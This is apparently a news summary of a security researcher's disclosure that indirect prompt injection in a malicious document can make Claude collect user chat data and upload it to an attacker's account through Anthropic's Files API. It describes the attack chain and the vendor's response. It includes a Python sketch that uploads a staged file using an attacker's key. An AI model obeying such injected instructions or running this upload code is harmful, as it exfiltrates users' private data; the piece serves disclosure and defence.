4 min read | Saved February 14, 2026
Do you care about this?
A security researcher revealed how attackers can exploit Anthropic's Claude AI, using indirect prompt injection to extract user data. By tricking Claude into uploading files to an attacker-controlled account, an attacker can exfiltrate sensitive information, including chat conversations. The researcher reported the issue, but Anthropic initially dismissed it as a model safety concern.
If you do, here's more
Attackers can exploit Anthropic's Claude AI to steal user data through a technique called indirect prompt injection. Security researcher Johann Rehberger demonstrated how the method can manipulate Claude's Files API. If the AI has network access (enabled by default on some plans), specially crafted prompts can direct it to collect sensitive information and upload it to the attacker's account using an API key the attacker supplies. The process allows the exfiltration of up to 30MB of data at a time, which can include private chat conversations saved by Claude's 'memories' feature.
The attack begins when a user opens a malicious document in Claude for analysis. Instructions injected via the document take control of the AI, directing it to save the user's data in its sandbox environment and then send that data to the attacker's account through the Anthropic Files API. Anthropic initially dismissed the report as a model safety issue, but after Rehberger published the details, the company acknowledged that the vulnerability was valid to report. Anthropic's documentation warns about the risks of network access, outlining attack vectors that could lead to data leaks and code execution.
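To make the exfiltration channel concrete: it is just an ordinary Files API upload, authenticated with the attacker's key rather than the victim's, so the uploaded file lands in the attacker's account. Below is a minimal sketch of what such an upload from inside the sandbox might look like, assuming the attacker's key was planted via the injected prompt. The key and file path are invented placeholders; the endpoint and header names follow Anthropic's published Files API documentation, though the exact code Rehberger had Claude run is not reproduced here.

```python
# Illustrative sketch only -- all values are hypothetical placeholders.
# Shows the exfiltration channel: a standard upload to Anthropic's
# Files API, authenticated with the ATTACKER's key, so the file is
# stored in the attacker's account instead of the victim's.
import requests

ATTACKER_API_KEY = "sk-ant-..."  # hypothetical: planted via the injected prompt

# Hypothetical file the injected instructions told Claude to write
# into its sandbox (e.g., a dump of the user's chat data).
with open("/tmp/collected_data.txt", "rb") as f:
    resp = requests.post(
        "https://api.anthropic.com/v1/files",
        headers={
            "x-api-key": ATTACKER_API_KEY,
            "anthropic-version": "2023-06-01",
            "anthropic-beta": "files-api-2025-04-14",  # Files API beta flag
        },
        files={"file": f},  # multipart upload of the staged file
    )

print(resp.status_code, resp.json())
```

If the article's 30MB-at-a-time figure reflects a per-upload cap, exfiltrating more data would simply mean repeating such requests.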